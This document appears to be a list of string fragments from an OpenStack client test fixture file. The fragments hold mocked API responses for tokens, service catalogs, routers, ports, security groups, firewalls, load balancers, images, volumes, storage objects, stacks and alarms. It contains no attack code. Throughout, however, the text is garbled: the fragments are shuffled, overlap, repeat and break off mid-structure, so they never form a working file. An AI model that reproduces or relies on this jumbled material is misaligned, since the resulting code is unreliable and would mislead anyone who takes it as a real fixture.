"\"f7d45c89-008e-4bab-88ad-d6811724c51c\", \"port_range_max\": None, \"port_range_min\": None, \"protocol\": None, \"remote_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"remote_ip_prefix\": None, \"security_group_id\": \"12345678-1234-1234-1234-123456789012\",",
"[{ 'id': 'edc12489faa74ee0aca0b8a0b4d74a74', 'name': 'Member'}], 'roles_links': [], 'username': 'exampleuser' } } } ROLE_LIST",
"\"router1\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"id\": ROUTERS_IDS[1] }, { \"status\": \"ACTIVE\", \"external_gateway_info\": {\"network_id\":",
"\"2014-02-03T14:13:54\" }, { \"checksum\": \"c352f4e7121c6eae958bc1570324f17e\", \"container_format\": \"aki\", \"created_at\": \"2014-02-03T14:13:52\", \"deleted\": False, \"deleted_at\": None,",
"LBAAS_HEALTHMONITOR_IDS[0] } ] } LBAAS_VIP_LIST = { \"vips\": [ { \"status\": \"ACTIVE\", \"protocol\":",
"\"images\": [ { \"checksum\": \"f8a2eeee2dc65b3d9b6e63678955bd83\", \"container_format\": \"ami\", \"created_at\": \"2014-02-03T14:13:53\", \"deleted\": False, \"deleted_at\": None,",
"\"remote_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"remote_ip_prefix\": None, \"security_group_id\": \"12345678-1234-1234-1234-123456789012\", \"tenant_id\": PROJECT_ID }, { \"direction\": \"ingress\", \"ethertype\":",
"= ['janeausten', 'marktwain'] STORAGE_OBJECTS = [{'container': 'janeausten', 'name': 'foo'}, {'container': 'janeausten', 'name': 'bar'},",
"u'name': u'admin'}, {u'id': u'9c3698e2f6a34d59b45d969d78403942', u'name': u'heat_stack_user'}, {u'id': u'9fe2ff9ee4384b1894a90878d3e92bab', u'name': u'_member_'}, {u'id': u'b6673106f5c64c0cbc1970ad706d38c0', u'name':",
"\"protocol\": \"HTTP\", \"description\": \"\", \"address\": \"10.0.0.125\", \"protocol_port\": 80, \"port_id\": PRIVATE_PORT_IDS[0], \"id\": LBAAS_VIP_IDS[0], \"status_description\":",
"STORAGE_OBJECTS[0]['name'], \"content_type\":\"application/octet-stream\" }, { \"hash\": \"ed076287532e86365e841e92bfc50d8c\", \"last_modified\": \"2014-01-15T16:37:43.427570\", \"bytes\": 12, \"name\": STORAGE_OBJECTS[1]['name'], \"content_type\":\"application/octet-stream\"",
"{ \"attachments\": [], \"availability_zone\": \"nova\", \"bootable\": \"false\", \"created_at\": \"2014-02-03T14:22:52.000000\", \"display_description\": None, \"display_name\": \"toto\",",
"VOLUME_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Volume Service', 'type': 'volume' }, { 'endpoints':",
"{ \"floatingips\": [ { \"router_id\": \"d23abc8d-2991-4a55-ba98-2aaea84cc72f\", \"tenant_id\": PROJECT_ID, \"floating_network_id\": \"376da547-b977-4cfe-9cba-275c80debf57\", \"fixed_ip_address\": \"10.0.0.3\", \"floating_ip_address\":",
"\"admin_state_up\": True, \"weight\": 1, \"status\": \"ACTIVE\", \"status_description\": \"member test1\", \"pool_id\": LBAAS_POOL_IDS[0] }, {",
"= { \"pools\": [ { \"status\": \"ACTIVE\", \"lb_method\": \"ROUND_ROBIN\", \"protocol\": \"HTTP\", \"description\": \"\",",
"Service', 'type': 'image' }, { 'endpoints': [{ 'adminURL': 'http://admin:8774/v2/225da22d3ce34b15877ea70b2a575f58', 'internalURL': COMPUTE_INTERNAL_ENDPOINT, 'publicURL': COMPUTE_PUBLIC_ENDPOINT,",
"[\"he717f53-3707-49b9-9dd0-fd063e6lbass\"] LBAAS_POOL_IDS = [\"lb815f5b-a228-17bb-a5e5-f139c3e476f6\", \"dlb15f5b-a228-47bb-a5e5-f139c4e47po6\"] # Simulating JSON sent from the Server PROJECT_SCOPED_TOKEN",
"\"name\": \"Test-Pools\", \"health_monitors_status\": [], \"members\": [], \"provider\": \"haproxy\", \"status_description\": None, \"id\": LBAAS_POOL_IDS[1] }",
"\"binding:vif_type\": \"ovs\", \"device_owner\": \"network:router_interface\", \"binding:capabilities\": { \"port_filter\": False }, \"mac_address\": \"fa:16:3e:2d:dc:7e\", \"fixed_ips\": [",
"{ \"snapshots\": [ { \"id\": SNAPSHOTS_IDS[0], \"display_name\": \"snap-001\", \"display_description\": \"Daily backup\", \"volume_id\": \"521752a6-acf6-4b2d-bc7a-119f9148cd8c\",",
"ROUTERS_IDS[0] } ] } ROUTER1_PORTS = { \"ports\": [ { \"status\": \"DOWN\", \"name\":",
"\"ACTIVE\", \"external_gateway_info\": {\"network_id\": \"3c5bcddd-6af9-4e6b-9c3e-c153e521cab8\"}, \"name\": \"second_routers\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"id\": ROUTERS_IDS[0] },",
"{ \"firewall_rules\": [ { \"protocol\": \"tcp\", \"description\": \"Firewall rule 1\", \"source_port\": None, \"source_ip_address\":",
"\"DOWN\", \"tenant_id\": \"ANOTHER_PROJECT\" } ]} REMOVE_ROUTER_INTERFACE = { \"id\": \"8604a0de-7f6b-409a-a47c-a1cc7bc77b2e\", \"tenant_id\": \"2f245a7b-796b-4f26-9cf9-9e82d248fda7\", \"port_id\":",
"STORAGE_CONTAINERS[1] } ] STORAGE_OBJECTS_LIST_0 = [ { \"hash\": \"451e372e48e0f6b1114fa0724aa79fa1\", \"last_modified\": \"2014-01-15T16:41:49.390270\", \"bytes\": 14,",
"[ \"766110ac-0fde-4c31-aed7-72a97e78310b\" ], \"status\": \"DOWN\", \"tenant_id\": PROJECT_ID }, { \"admin_state_up\": True, \"allowed_address_pairs\": [],",
"] } METERING_LABEL_LIST = { \"metering_labels\": [ { \"tenant_id\": PROJECT_ID, \"description\": \"Meter label",
"\"href\": \"http://openstack.example.com/openstack/flavors/1\", \"rel\": \"bookmark\" } ] }, \"hostId\": \"16d193736a5cfdb60c697ca27ad071d6126fa13baeb670fc9d10645e\", \"id\": SERVERS_IDS[0], \"image\": {",
"\"status\": \"ACTIVE\", \"external_gateway_info\": None, \"name\": \"second_routers\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"id\": ROUTERS_IDS[0] }",
"PORTS_IDS = [\"d7815f5b-a228-47bb-a5e5-f139c4e476f6\"] NETWORKS_IDS = [\"9d83c053-b0a4-4682-ae80-c00df269ce0a\", \"ebda9658-093b-41ba-80ce-0cf8cb8365d4\"] SECGROUPS_IDS = [\"85cc3048-abc3-43cc-89b3-377341426ac5\"] FLOATING_IPS_IDS = [\"2f245a7b-796b-4f26-9cf9-9e82d248fda7\",",
"{ \"id\": \"1\", \"links\": [ { \"href\": \"http://openstack.example.com/openstack/flavors/1\", \"rel\": \"bookmark\" } ] },",
"\"ports\": [ { \"status\": \"ACTIVE\", \"name\": \"\", \"admin_state_up\": True, \"network_id\": \"ebda9658-093b-41ba-80ce-0cf8cb8365d4\", \"tenant_id\": PROJECT_ID,",
"\"destination_port\": \"80\", \"id\": FIREWALL_RULE_IDS[1], \"name\": \"\", \"tenant_id\": PROJECT_ID, \"enabled\": True, \"action\": \"allow\", \"ip_version\":",
"'endpoints_links': [], 'name': 'Orchestration service', 'type': 'orchestration' }], 'token': { 'expires': '2012-10-03T16:53:36Z', 'id':",
"\"haproxy\", \"status_description\": None, \"id\": LBAAS_POOL_IDS[0] }, { \"status\": \"ACTIVE\", \"lb_method\": \"ROUND_ROBIN\", \"protocol\": \"HTTP\",",
"[ { \"tenant_id\": PROJECT_ID, \"description\": \"Meter label test1\", \"name\": \"Meterlabel1\", \"id\": METERING_LABEL_IDS[0] },",
"# # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to",
"service', 'type': 'metering' }, { 'endpoints': [{ 'adminURL': 'http://heat.usr.lab0.aub.cw-labs.net:8777', 'internalURL': ORCHESTRATION_INTERNAL_ENDPOINT, 'publicURL': ORCHESTRATION_PUBLIC_ENDPOINT,",
"True, \"tenant_id\": PROJECT_ID, \"firewall_policy_id\": FIREWALL_POLICY_IDS[1], \"id\": FIREWALL_IDS[1], \"description\": \"\" } ] } METERING_LABEL_LIST",
"], \"tenant_id\": PROJECT_ID }, { \"description\": \"default\", \"id\": \"12345678-1234-1234-1234-123456789012\", \"name\": \"default\", \"security_group_rules\": [",
"}, { \"href\": \"http://openstack.example.com/openstack/servers/05184ba3-00ba-4fbc-b7a2-03b62b884931\", \"rel\": \"bookmark\" } ], \"metadata\": { \"My Server Name\":",
"\"ok\", \"state_timestamp\": \"2013-11-21T12:33:08.486228\", \"threshold_rule\": None, \"timestamp\": \"2013-11-21T12:33:08.486221\", \"type\": \"threshold\", \"user_id\": \"c96c887c216949acbdfbd8b494863567\" } ]",
"u'6c3ceb6e6112486ba1465a636652b544', u'name': u'ResellerAdmin'}, {u'id': u'7e9fd9336bc24936b3bbde15d1dd8f64', u'name': u'service'}, {u'id': u'972b51c620fe481e8e37682d8b5dbd1b', u'name': u'admin'}, {u'id': u'9c3698e2f6a34d59b45d969d78403942',",
"3714968, \"status\": \"active\", \"updated_at\": \"2014-02-03T14:13:53\" } ] } ALARMS_LIST = [ { \"alarm_actions\":",
"None, \"remote_ip_prefix\": None, \"security_group_id\": \"12345678-1234-1234-1234-123456789012\", \"tenant_id\": PROJECT_ID }, { \"direction\": \"egress\", \"ethertype\": \"IPv4\",",
"{ \"port_filter\": False }, \"binding:host_id\": \"\", \"binding:vif_type\": \"unbound\", \"device_id\": \"\", \"device_owner\": \"compute:azerty\", \"extra_dhcp_opts\":",
"METERING_INTERNAL_ENDPOINT = 'http://ceilometer.usr.lab0.aub.cw-labs.net:8777' ORCHESTRATION_INTERNAL_ENDPOINT = 'http://heat.usr.lab0.aub.cw-labs.net:8004/v1' AUTH_URL_RESPONSE = { u'version': { u'id': u'v2.0',",
"} }, 'user': { 'id': USER_ID, 'name': 'exampleuser', 'roles': [{ 'id': 'edc12489faa74ee0aca0b8a0b4d74a74', 'name':",
"\"tenant_id\": PROJECT_ID } ], \"tenant_id\": PROJECT_ID } ] } FLOATING_IPS_LIST = { \"floatingips\":",
"backup\", \"volume_id\": \"521752a6-acf6-4b2d-bc7a-119f9148cd8c\", \"status\": \"available\", \"size\": 10, \"created_at\": \"2012-02-29T03:50:07Z\" }, { \"id\": SNAPSHOTS_IDS[1],",
"{ \"router\": { \"status\": \"ACTIVE\", \"external_gateway_info\": None, \"name\": \"second_routers\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID,",
"\"description\": \"default\", \"id\": \"12345678-1234-1234-1234-123456789012\", \"name\": \"default\", \"security_group_rules\": [ { \"direction\": \"egress\", \"ethertype\": \"IPv6\",",
"], \"id\": \"664ebd1a-facd-4c20-948c-07a784475ab0\", \"device_id\": ROUTERS_IDS[0] } ] } ROUTER1_PORTS = { \"ports\": [",
"FLOATING_IPS_IDS = [\"2f245a7b-796b-4f26-9cf9-9e82d248fda7\", \"61cea855-49cb-4846-997d-801b70c71bdd\"] SERVERS_IDS = [\"616fb98f-46ca-475e-917e-2563e5a8cd19\"] IMAGES_IDS = [\"37717f53-3707-49b9-9dd0-fd063e6b9fc5\", \"4e150966-cbe7-4fd7-a964-41e008d20f10\", \"482fbcc3-d831-411d-a073-ddc828a7a9ed\"] ALARMS_IDS",
"METERING_LABEL_IDS[0] }, { \"tenant_id\": PROJECT_ID, \"description\": \"Meter label test2\", \"name\": \"Meterlabel2\", \"id\": METERING_LABEL_IDS[1]",
"\"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"firewall_policy_id\": FIREWALL_POLICY_IDS[0], \"id\": FIREWALL_IDS[0], \"description\": \"\" }, { \"status\":",
"\"c96c887c216949acbdfbd8b494863567\", \"repeat_actions\": False, \"state\": \"ok\", \"state_timestamp\": \"2013-11-21T12:33:08.486228\", \"threshold_rule\": None, \"timestamp\": \"2013-11-21T12:33:08.486221\", \"type\": \"threshold\",",
"required by applicable law or agreed to in writing, software # distributed under",
"\"tenant_id\": PROJECT_ID, \"audited\": False, \"shared\": False, \"id\": FIREWALL_POLICY_IDS[1], \"description\": \"Testing firewall policy 2\"",
"\"\", \"health_monitors\": [], \"subnet_id\": \"b892434a-59f7-4404-a05d-9562977e1678\", \"tenant_id\": PROJECT_ID, \"admin_state_up\": True, \"name\": \"Test-Pools\", \"health_monitors_status\": [],",
"\"TestFireWallPolicy1\", \"firewall_rules\": [FIREWALL_RULE_IDS[0]], \"tenant_id\": PROJECT_ID, \"audited\": False, \"shared\": False, \"id\": FIREWALL_POLICY_IDS[0], \"description\": \"Testing",
"{ 'id': USER_ID, 'name': 'exampleuser', 'roles': [{ 'id': 'edc12489faa74ee0aca0b8a0b4d74a74', 'name': 'Member'}], 'roles_links': [],",
"\"TestFireWallPolicy2\", \"firewall_rules\": [FIREWALL_RULE_IDS[1]], \"tenant_id\": PROJECT_ID, \"audited\": False, \"shared\": False, \"id\": FIREWALL_POLICY_IDS[1], \"description\": \"Testing",
"}, { \"status\": \"ACTIVE\", \"external_gateway_info\": {\"network_id\": \"3c5bcddd-6af9-4e6b-9c3e-c153e521cab8\"}, \"name\": \"router1\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID,",
"}, { \"direction\": \"ingress\", \"ethertype\": \"IPv6\", \"id\": \"c0b09f00-1d49-4e64-a0a7-8a186d928138\", \"port_range_max\": None, \"port_range_min\": None, \"protocol\":",
"unbound port\", \"network_id\": \"bf8d2e1f-221e-4908-a4ed-b6c0fd06e518\", \"security_groups\": [ \"766110ac-0fde-4c31-aed7-72a97e78310b\" ], \"status\": \"DOWN\", \"tenant_id\": PROJECT_ID },",
"{ \"href\": \"http://openstack.example.com/openstack/servers/05184ba3-00ba-4fbc-b7a2-03b62b884931\", \"rel\": \"bookmark\" } ], \"metadata\": { \"My Server Name\": \"Apache1\"",
"in compliance with the License. You may obtain # a copy of the",
"'type': 'image' }, { 'endpoints': [{ 'adminURL': 'http://admin:8774/v2/225da22d3ce34b15877ea70b2a575f58', 'internalURL': COMPUTE_INTERNAL_ENDPOINT, 'publicURL': COMPUTE_PUBLIC_ENDPOINT, 'region':",
"\"second_routers\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"id\": ROUTERS_IDS[0] } } ROUTER0_PORTS = { \"ports\":",
"\"timestamp\": \"2013-11-21T12:33:08.486221\", \"type\": \"threshold\", \"user_id\": \"c96c887c216949acbdfbd8b494863567\" } ] STACKS_LIST = { \"stacks\": [",
"\"ROUND_ROBIN\", \"protocol\": \"HTTP\", \"description\": \"\", \"health_monitors\": [], \"subnet_id\": \"b892434a-59f7-4404-a05d-9562977e1678\", \"tenant_id\": PROJECT_ID, \"admin_state_up\": True,",
"\"networks\": [ { \"status\": \"ACTIVE\", \"subnets\": [\"a318fcb4-9ff0-4485-b78c-9e6738c21b26\"], \"name\": \"private\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID,",
"\"tenant_id\": PROJECT_ID, \"description\": \"Meter label test2\", \"name\": \"Meterlabel2\", \"id\": METERING_LABEL_IDS[1] } ] }",
"'type': 'network' }, { 'endpoints': [{ 'adminURL': 'http://ceilometer.usr.lab0.aub.cw-labs.net:8777', 'internalURL': METERING_INTERNAL_ENDPOINT, 'publicURL': METERING_PUBLIC_ENDPOINT, 'region':",
"u'application/pdf'} ], u'media-types': [ {u'base': u'application/json', u'type': u'application/vnd.openstack.identity-v2.0+json'}, {u'base': u'application/xml', u'type': u'application/vnd.openstack.identity-v2.0+xml'} ],",
"\"device_owner\": \"network:router_gateway\", \"binding:capabilities\": { \"port_filter\": False }, \"mac_address\": \"fa:16:3e:b9:ef:05\", \"fixed_ips\": [ { \"subnet_id\":",
"\"disk_format\": \"ari\", \"id\": \"482fbcc3-d831-411d-a073-ddc828a7a9ed\", \"is_public\": True, \"min_disk\": 0, \"min_ram\": 0, \"name\": \"cirros-0.3.1-x86_64-uec-ramdisk\", \"owner\":",
"'id': PROJECT_ID, 'name': 'exampleproject' } }, 'user': { 'id': USER_ID, 'name': 'exampleuser', 'roles':",
"\"mac_address\": \"fa:16:3e:f5:62:22\", \"name\": \"custom unbound port\", \"network_id\": \"bf8d2e1f-221e-4908-a4ed-b6c0fd06e518\", \"security_groups\": [ \"766110ac-0fde-4c31-aed7-72a97e78310b\" ], \"status\":",
"\"HTTP\", \"description\": \"\", \"health_monitors\": [], \"subnet_id\": \"b892434a-49f7-4404-a05d-9562977e1678\", \"tenant_id\": PROJECT_ID, \"admin_state_up\": True, \"name\": \"Test-Pools\",",
"], \"status\": \"DOWN\", \"tenant_id\": \"ANOTHER_PROJECT\" } ]} REMOVE_ROUTER_INTERFACE = { \"id\": \"8604a0de-7f6b-409a-a47c-a1cc7bc77b2e\", \"tenant_id\":",
"+ ROUTER1_PORTS['ports'] + [ { \"admin_state_up\": True, \"allowed_address_pairs\": [], \"binding:capabilities\": { \"port_filter\": False",
"\"size\": 10, \"created_at\": \"2012-02-29T03:50:07Z\" }, { \"id\": SNAPSHOTS_IDS[1], \"display_name\": \"snap-002\", \"display_description\": \"Weekly backup\",",
"[\"85cc3048-abc3-43cc-89b3-377341426ac5\"] FLOATING_IPS_IDS = [\"2f245a7b-796b-4f26-9cf9-9e82d248fda7\", \"61cea855-49cb-4846-997d-801b70c71bdd\"] SERVERS_IDS = [\"616fb98f-46ca-475e-917e-2563e5a8cd19\"] IMAGES_IDS = [\"37717f53-3707-49b9-9dd0-fd063e6b9fc5\", \"4e150966-cbe7-4fd7-a964-41e008d20f10\", \"482fbcc3-d831-411d-a073-ddc828a7a9ed\"]",
"\"protocol_port\": 80, \"port_id\": PRIVATE_PORT_IDS[0], \"id\": LBAAS_VIP_IDS[0], \"status_description\": \"\", \"name\": \"test-http-vip\", \"admin_state_up\": True, \"tenant_id\":",
"\"\", \"addresses\": { \"private\": [ { \"addr\": \"192.168.0.3\", \"version\": 4 } ] },",
"\"ACTIVE\", \"tenant_id\": \"openstack\", \"updated\": \"2012-09-07T16:56:37Z\", \"user_id\": \"fake\" } ] } IMAGES_LIST = {",
"} ] } LBAAS_POOL_LIST = { \"pools\": [ { \"status\": \"ACTIVE\", \"lb_method\": \"ROUND_ROBIN\",",
"False }, \"mac_address\": \"fa:16:3e:4a:3a:a2\", \"fixed_ips\": [ { \"subnet_id\": \"aca4d43c-c48c-4a2c-9bb6-ba374ef7e135\", \"ip_address\": \"172.24.4.226\" } ],",
"= [\"37717f53-3707-49b9-9dd0-fd063e6lbass\", \"la650123-e982-4552-9dec-5dc5d3ea4172\"] LBAAS_VIP_IDS = [\"616fb98f-36ca-475e-917e-1563e5a8cd10\", \"102fbcc3-d831-411d-a333-ddc828a7a9ed\"] LBAAS_HEALTHMONITOR_IDS = [\"he717f53-3707-49b9-9dd0-fd063e6lbass\"] LBAAS_POOL_IDS = [\"lb815f5b-a228-17bb-a5e5-f139c3e476f6\",",
"\"bytes\": 14, \"name\": STORAGE_OBJECTS[0]['name'], \"content_type\":\"application/octet-stream\" }, { \"hash\": \"ed076287532e86365e841e92bfc50d8c\", \"last_modified\": \"2014-01-15T16:37:43.427570\", \"bytes\": 12,",
"Simulating JSON sent from the Server PROJECT_SCOPED_TOKEN = { 'access': { 'serviceCatalog': [{",
"\"subnet_id\": \"a318fcb4-9ff0-4485-b78c-9e6738c21b26\", \"ip_address\": \"10.0.0.1\" } ], \"id\": PORTS_IDS[0], \"device_id\": ROUTERS_IDS[1] } ] }",
"14, \"name\": STORAGE_CONTAINERS[1] } ] STORAGE_OBJECTS_LIST_0 = [ { \"hash\": \"451e372e48e0f6b1114fa0724aa79fa1\", \"last_modified\": \"2014-01-15T16:41:49.390270\",",
"\"fwass-test-1\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"firewall_policy_id\": FIREWALL_POLICY_IDS[0], \"id\": FIREWALL_IDS[0], \"description\": \"\" }, {",
"\"remote_group_id\": None, \"remote_ip_prefix\": None, \"security_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"tenant_id\": PROJECT_ID }, { \"direction\": \"egress\", \"ethertype\":",
"{ \"direction\": \"ingress\", \"ethertype\": \"IPv6\", \"id\": \"c0b09f00-1d49-4e64-a0a7-8a186d928138\", \"port_range_max\": None, \"port_range_min\": None, \"protocol\": None,",
"'name': 'exampleproject' } }, 'user': { 'id': USER_ID, 'name': 'exampleuser', 'roles': [{ 'id':",
"ALARMS_IDS = [\"ca950223-e982-4552-9dec-5dc5d3ea4172\"] STACKS_IDS = [\"5c136348-5550-4ec5-8bd6-b83241844db3\", \"ec4083c1-3667-47d2-91c9-ce0bc8e3c2b9\"] UNBOUND_PORT_ID = \"abcdb45e-45fe-4e04-8704-bf6f58760000\" PRIVATE_PORT_IDS = [\"p7815f5b-a228-47bb-a5e5-f139c4f476ft\",",
"[ { \"description\": \"First test\", \"links\": [ { \"href\": \"http://site/5c136348-5550-4ec5-8bd6-b83241844db3\", \"rel\": \"self\" }",
"\"102fbcc3-d831-411d-a333-ddc828a7a9ed\"] LBAAS_HEALTHMONITOR_IDS = [\"he717f53-3707-49b9-9dd0-fd063e6lbass\"] LBAAS_POOL_IDS = [\"lb815f5b-a228-17bb-a5e5-f139c3e476f6\", \"dlb15f5b-a228-47bb-a5e5-f139c4e47po6\"] # Simulating JSON sent from",
"}], 'token': { 'expires': '2012-10-03T16:53:36Z', 'id': TOKEN_ID, 'tenant': { 'description': '', 'enabled': True,",
"[ { \"ip_address\": \"10.0.0.4\", \"subnet_id\": \"51351eb9-7ce5-42cf-89cd-cea0b0fc510f\" } ], \"id\": UNBOUND_PORT_ID, \"mac_address\": \"fa:16:3e:f5:62:22\", \"name\":",
"= '225da22d3ce34b15877ea70b2a575f58' AUTH_URL = \"http://localhost:5000/v2.0\" ROLE_URL = \"http://admin:35357/v2.0/OS-KSADM\" VOLUME_PUBLIC_ENDPOINT = 'http://public:8776/v1/225da22d3ce34b15877ea70b2a575f58' IMAGE_PUBLIC_ENDPOINT =",
"\"ebda9658-093b-41ba-80ce-0cf8cb8365d4\", \"tenant_id\": PROJECT_ID, \"binding:vif_type\": \"ovs\", \"device_owner\": \"network:router_gateway\", \"binding:capabilities\": { \"port_filter\": False }, \"mac_address\":",
"\"shared\": False, \"id\": FIREWALL_POLICY_IDS[1], \"description\": \"Testing firewall policy 2\" } ] } FIREWALL_RULE_LIST",
"{ \"port_filter\": False }, \"mac_address\": \"fa:16:3e:2d:dc:7e\", \"fixed_ips\": [ { \"subnet_id\": \"a318fcb4-9ff0-4485-b78c-9e6738c21b26\", \"ip_address\": \"10.0.0.1\"",
"\"external_gateway_info\": {\"network_id\": \"3c5bcddd-6af9-4e6b-9c3e-c153e521cab8\"}, \"name\": \"second_routers\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"id\": ROUTERS_IDS[0] }, {",
"'name': 'Compute Service', 'type': 'compute' }, { 'endpoints': [{ 'adminURL': 'http://admin:8773/services/Admin', 'internalURL': 'http://internal:8773/services/Cloud',",
"\"href\": \"http://openstack.example.com/openstack/images/70a599e0-31e7-49b7-b260-868f441e862b\", \"rel\": \"bookmark\" } ] }, \"links\": [ { \"href\": \"http://openstack.example.com/v2/openstack/servers/05184ba3-00ba-4fbc-b7a2-03b62b884931\", \"rel\":",
"{ \"href\": \"http://site/5c136348-5550-4ec5-8bd6-b83241844db3\", \"rel\": \"self\" } ], \"stack_status_reason\": \"\", \"stack_name\": \"stack1\", \"creation_time\": \"2015-03-03T14:08:54Z\",",
"\"allow\", \"ip_version\": 4, \"shared\": False } ] } SERVERS_LIST = { \"servers\": [",
"{u'href': u'http://docs.openstack.org/api/openstack-identity-service/2.0/identity-dev-guide-2.0.pdf', u'rel': u'describedby', u'type': u'application/pdf'} ], u'media-types': [ {u'base': u'application/json', u'type': u'application/vnd.openstack.identity-v2.0+json'},",
"\"IPv4\", \"id\": \"93aa42e5-80db-4581-9391-3a608bd0e448\", \"port_range_max\": None, \"port_range_min\": None, \"protocol\": None, \"remote_group_id\": None, \"remote_ip_prefix\": None,",
"\"description\": \"Meter label test1\", \"name\": \"Meterlabel1\", \"id\": METERING_LABEL_IDS[0] }, { \"tenant_id\": PROJECT_ID, \"description\":",
"}, \"name\": \"new-server-test\", \"progress\": 0, \"status\": \"ACTIVE\", \"tenant_id\": \"openstack\", \"updated\": \"2012-09-07T16:56:37Z\", \"user_id\": \"fake\"",
"REMOVE_ROUTER_INTERFACE = { \"id\": \"8604a0de-7f6b-409a-a47c-a1cc7bc77b2e\", \"tenant_id\": \"2f245a7b-796b-4f26-9cf9-9e82d248fda7\", \"port_id\": \"3a44f4e5-1694-493a-a1fb-393881c673a4\", \"subnet_id\": \"a2f1f29d-571b-4533-907f-5803ab96ead1\" } NETWORKS_LIST",
"'name': 'exampleuser', 'roles': [{ 'id': 'edc12489faa74ee0aca0b8a0b4d74a74', 'name': 'Member'}], 'roles_links': [], 'username': 'exampleuser' }",
"= 'http://nova.usr.lab0.aub.cw-labs.net:8774/v2/43c9e28327094e1b81484f4b9aee74d5' METERING_INTERNAL_ENDPOINT = 'http://ceilometer.usr.lab0.aub.cw-labs.net:8777' ORCHESTRATION_INTERNAL_ENDPOINT = 'http://heat.usr.lab0.aub.cw-labs.net:8004/v1' AUTH_URL_RESPONSE = { u'version': {",
"\"fixed_ips\": [ { \"ip_address\": \"10.0.0.4\", \"subnet_id\": \"51351eb9-7ce5-42cf-89cd-cea0b0fc510f\" } ], \"id\": \"61c1b45e-45fe-4e04-8704-bf6f5876607d\", \"mac_address\": \"fa:16:3e:f5:62:22\",",
"\"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"subnet_id\": \"b892434a-49f7-4404-a05d-9562977e1678\", \"connection_limit\": -1, \"pool_id\": LBAAS_POOL_IDS[1], \"session_persistence\": None }",
"\"fixed_ip_address\": None, \"floating_ip_address\": \"172.24.4.227\", \"port_id\": None, \"id\": FLOATING_IPS_IDS[1] } ] } LBAAS_HEALTHMONITOR_LIST =",
"SNAPSHOTS_LIST = { \"snapshots\": [ { \"id\": SNAPSHOTS_IDS[0], \"display_name\": \"snap-001\", \"display_description\": \"Daily backup\",",
"= { \"members\": [ { \"id\": LBAAS_MEMBER_IDS[0], \"address\": \"10.0.0.122\", \"protocol_port\": 80, \"tenant_id\": PROJECT_ID,",
"2.0 (the \"License\"); you may # not use this file except in compliance",
"Service', 'type': 'network' }, { 'endpoints': [{ 'adminURL': 'http://ceilometer.usr.lab0.aub.cw-labs.net:8777', 'internalURL': METERING_INTERNAL_ENDPOINT, 'publicURL': METERING_PUBLIC_ENDPOINT,",
"\"http://openstack.example.com/openstack/servers/05184ba3-00ba-4fbc-b7a2-03b62b884931\", \"rel\": \"bookmark\" } ], \"metadata\": { \"My Server Name\": \"Apache1\" }, \"name\":",
"[ { \"subnet_id\": \"aca4d43c-c48c-4a2c-9bb6-ba374ef7e135\", \"ip_address\": \"172.24.4.227\" } ], \"id\": \"664ebd1a-facd-4c20-948c-07a784475ab0\", \"device_id\": ROUTERS_IDS[0] }",
"ROUTER1_PORTS['ports'] + [ { \"admin_state_up\": True, \"allowed_address_pairs\": [], \"binding:capabilities\": { \"port_filter\": False },",
"\"id\": NETWORKS_IDS[0], \"shared\": False }, { \"status\": \"ACTIVE\", \"subnets\": [\"aca4d43c-c48c-4a2c-9bb6-ba374ef7e135\"], \"name\": \"nova\", \"admin_state_up\":",
"# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT",
"\"min_ram\": 0, \"name\": \"cirros-0.3.1-x86_64-uec\", \"owner\": PROJECT_ID, \"properties\": { \"kernel_id\": \"4e150966-cbe7-4fd7-a964-41e008d20f10\", \"ramdisk_id\": \"482fbcc3-d831-411d-a073-ddc828a7a9ed\" },",
"\"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"id\": NETWORKS_IDS[1], \"shared\": False }, { \"status\": \"ACTIVE\", \"subnets\":",
"\"id\": \"afc75773-640e-403c-9fff-62ba98db1f19\", \"shared\": True } ] } SECGROUPS_LIST = { \"security_groups\": [ {",
"\"Testing firewall policy 1\" }, { \"name\": \"TestFireWallPolicy2\", \"firewall_rules\": [FIREWALL_RULE_IDS[1]], \"tenant_id\": PROJECT_ID, \"audited\":",
"{ \"status\": \"ACTIVE\", \"subnets\": [\"aca4d43c-c48c-4a2c-9bb6-ba374ef7e135\"], \"name\": \"nova\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"id\": NETWORKS_IDS[1],",
"\"remote_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"remote_ip_prefix\": None, \"security_group_id\": \"12345678-1234-1234-1234-123456789012\", \"tenant_id\": PROJECT_ID } ], \"tenant_id\": PROJECT_ID }",
"{}, \"protected\": False, \"size\": 3714968, \"status\": \"active\", \"updated_at\": \"2014-02-03T14:13:53\" } ] } ALARMS_LIST",
"\"properties\": {}, \"protected\": False, \"size\": 4955792, \"status\": \"active\", \"updated_at\": \"2014-02-03T14:13:52\" }, { \"checksum\":",
"\"status\": \"ACTIVE\", \"lb_method\": \"ROUND_ROBIN\", \"protocol\": \"HTTP\", \"description\": \"\", \"health_monitors\": [], \"subnet_id\": \"b892434a-49f7-4404-a05d-9562977e1678\", \"tenant_id\":",
"\"last_modified\": \"2014-01-15T16:41:49.390270\", \"bytes\": 14, \"name\": STORAGE_OBJECTS[0]['name'], \"content_type\":\"application/octet-stream\" }, { \"hash\": \"ed076287532e86365e841e92bfc50d8c\", \"last_modified\": \"2014-01-15T16:37:43.427570\",",
"u'rel': u'self'}], u'name': u'volumebackup-01', u'object_count': 22, u'size': 10, u'status': u'available', u'volume_id': u'45baf976-c20a-4894-a7c3-c94b7376bf55'} ]",
